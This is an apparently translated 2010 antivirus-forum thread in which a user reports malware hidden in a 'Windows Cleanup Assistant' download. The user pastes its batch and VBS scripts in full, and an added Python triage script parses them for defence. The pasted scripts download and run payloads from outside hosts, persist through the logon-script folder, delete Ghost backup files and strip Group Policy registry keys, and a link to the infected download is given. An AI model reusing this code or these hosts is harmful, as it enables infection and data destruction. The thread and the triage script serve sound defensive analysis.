Rising Kaka Security Forum

I ran a virus scan and still got hit from behind
jxchufei - 2010-11-6 23:07:00

This was the Windows Cleanup Assistant (Windows清理助手) downloaded from http://jsnetcom.onlinedown.com/down/zrswp3_newhua_x8z.zip. I hope Rising will test it: why can't it kill malicious code like this?
3.bat
@Echo Off
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
regedit.exe/s %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\winrp.reg
sys.bat
@Echo Off
Del %0
ssys.bat
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping  www.google.com  &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201001.swf    %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201002.swf    %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201003.swf    %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201004.swf    %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201005.swf    %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201006.swf    %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201007.swf    %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201008.swf    %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Exit
:End
ping    www.google.com    &&Goto ok
Goto End
yici.bat
@Echo Off
md "%SystemRoot%\ehome"
ping    www.google.com    &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011617.swf    %SystemRoot%\ehome\cacls.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011618.swf    %SystemRoot%\ehome\cacls.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011619.swf    %SystemRoot%\ehome\cacls.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011620.swf    %SystemRoot%\ehome\cacls1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011621.swf    %SystemRoot%\ehome\cacls1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011622.swf    %SystemRoot%\ehome\ca.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\ehome\cacls.vbs
Del %0
:End
ping    www.google.com    &&Goto ok
Goto End
notepa.bat
@Echo Off
Del /f/s/q %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\sys.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
rename %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\ssys.bat sys.bat
:Next
Del /f/s/q d:\*.GHO
Del /f/s/q e:\*.GHO
Del /f/s/q f:\*.GHO
Del /f/s/q g:\*.GHO
Del /f/s/q h:\*.GHO
Del /f/s/q i:\*.GHO
Del /f/s/q j:\*.GHO
Del /f/s/q k:\*.GHO
Del /f/s/q %SystemRoot%\Logon\sys.bat
Del /f/s/q %SystemRoot%\Logon\shijian.vbs
Del /f/s/q %SystemRoot%\Logon\index.vbs
rd 2 /s/q %SystemRoot%\GroupPolicy
Del /f/s/q %SystemRoot%\system32\GroupPolicy\33.vbs
Del /f/s/q %SystemRoot%\system32\GroupPolicy\2.bat
dEL %0

donw.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
wscript.sleep 1
sGet.SaveToFile iLocal,1

shijian.vbs
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000

winrp.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy]


Attachment: ehome.rar
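Static triage of the dropped batch scripts listed above, as an added example that is not part of the thread or of the sample: it pulls the URL/drop-path pairs handed to donw.vbs, the paths the scripts wipe, and the files they launch, without executing anything. The sample input is constructed to mirror the post's 3.bat/ssys.bat layout; example.invalid is a placeholder, not the post's download host.

```python
import re
from dataclasses import dataclass, field

# Constructed sample mirroring the post's batch scripts; the URL is a placeholder.
SAMPLE_BAT = r"""@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
ping  www.google.com  &&Goto ok
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://example.invalid/swf/1.swf    %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
Del /f/s/q d:\*.GHO
Exit
:End
"""

# donw.vbs <url> <local path>: the downloader invocation pattern used in the post.
DOWNLOADER_RE = re.compile(r"donw\.vbs\s+(\S+)\s+(\S+)", re.IGNORECASE)
DEL_RE = re.compile(r"^\s*del\s+((?:/\S+\s+)*)(\S+)", re.IGNORECASE)
START_RE = re.compile(r"^\s*start\s+(\S+)", re.IGNORECASE)
# Per-user Group Policy logon-script folder the dropper files live in.
LOGON_DIR = r"\grouppolicy\user\scripts\logon"

@dataclass
class Triage:
    downloads: list = field(default_factory=list)  # (url, local path) pairs
    deletions: list = field(default_factory=list)  # paths the script wipes
    executed: list = field(default_factory=list)   # files it launches
    uses_logon_script_dir: bool = False            # logon-script persistence
    wipes_ghost_backups: bool = False              # *.GHO removal (anti-recovery)

def triage_batch(text: str) -> Triage:
    t = Triage()
    for line in text.splitlines():
        if LOGON_DIR in line.lower():
            t.uses_logon_script_dir = True
        if m := DOWNLOADER_RE.search(line):
            t.downloads.append((m.group(1), m.group(2)))
        elif m := DEL_RE.match(line):
            t.deletions.append(m.group(2))
            if m.group(2).lower().endswith(".gho"):
                t.wipes_ghost_backups = True
        elif m := START_RE.match(line):
            t.executed.append(m.group(1))
    return t
```

Feed it the real 3.bat, ssys.bat, yici.bat and notepa.bat text from the attachment to get the full list of download URLs, drop paths and wiped backups for blocking and cleanup.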
jxchufei - 2010-11-6 23:30:00
I realised I had been hit when I saw cmd.exe and conime.exe present in the process list at the same time. I hadn't done anything, and a full-disk scan found nothing either, so a trojan got installed just like that. I'm really not happy about it. I hope the technical staff can check what it downloaded and installed, and what else it left resident. Did I post this in the wrong place?
jxchufei - 2010-11-6 23:45:00
??? Are there no technical staff around?
超级游戏迷 - 2010-11-7 1:08:00
OP, please stop editing the first post; if someone clicks your link by mistake they will get infected...
超级游戏迷 - 2010-11-8 22:39:00
The file downloaded from the red link in the first post is really big (over 20 MB); any experts who are interested might want to download it and have a look...
我是拟定谁 - 2010-11-14 3:51:00
This user's post content has been blocked.